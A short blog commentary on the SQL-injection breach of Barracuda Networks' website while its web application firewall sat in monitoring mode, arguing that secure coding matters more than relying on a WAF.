Barracuda Networks is latest on the list of security vendors/service providers to be compromised. The Malaysian group, “HMSec,” used blind SQL injection to retrieve database contents including emails, CMS logins, and MD5-hashed passwords. A poston barracudalabs.com titled “Learning the Importance of WAF Technology – the Hard Way” explains that, “The Barracuda Web Application Firewall in front of the Barracuda Networks Web site was unintentionally placed in passive monitoring mode and was offline through a maintenance window that started Friday night (April 8 ) after close of business Pacific time.” It goes on to state that no financial information was stored on this database and that users’ password hashes were salted.
I think the title of that barracudalabs.com post is a little bit off. I think it should read, “Learning the Importance of Secure Software Development – the Hard Way.” This just goes to show that WAFs, while great for certain things, are merely a secondary security control. Secure application development best practices (like not string-concatenating user input with database queries) are a primary security control. A WAF can shield certain issues from exploitation before you have a chance to fix them at their source but you should not rely on the WAF to protect you from severe flaws like SQL injection. After all, what happens when the WAF becomes disabled or gets put into monitor-only mode?